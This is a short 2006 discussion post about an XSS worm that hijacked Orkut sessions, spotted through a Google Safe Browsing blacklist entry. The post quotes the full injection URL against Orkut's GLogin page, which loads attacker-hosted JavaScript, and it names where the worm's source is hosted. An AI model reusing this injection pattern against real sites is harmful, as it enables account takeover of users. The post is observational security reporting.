MemeStreams Discussion
XSS worm source code for hijacking Orkut accounts
by Acidus at 4:17 pm EST, Dec 9, 2006

I was running through some proxy logs, and saw a reference to http://sb.google.com/safebrowsing/update?version=goog-black-url:1:-1.

Requesting it redirected me to a blacklist of what look like phishing sites. However, all the way at the bottom was a reference to Google's Orkut site. Specifically the blacklist entry was for a GET-based XSS attack against Google's GLogin system.

https://www.orkut.com/GLogin.aspx?done=http://www.orkut.com/Scrapbook.aspx?na=\";};//--></script><script%20src=\'http://www.probranco.net/xmen.js\'></script><!--

If you request that URL, you get a 403 error page saying your query is from an automated attack. Looks very similar to a page Google returned during the Perl.Santy attack a year or so back.

The JavaScript source code to the attack is still available at http://www.probranco.net/xmen.js

It appears that the worm is for hijacking Orkut sessions. Here is an interesting thread from when it appears the worm's code was refined.
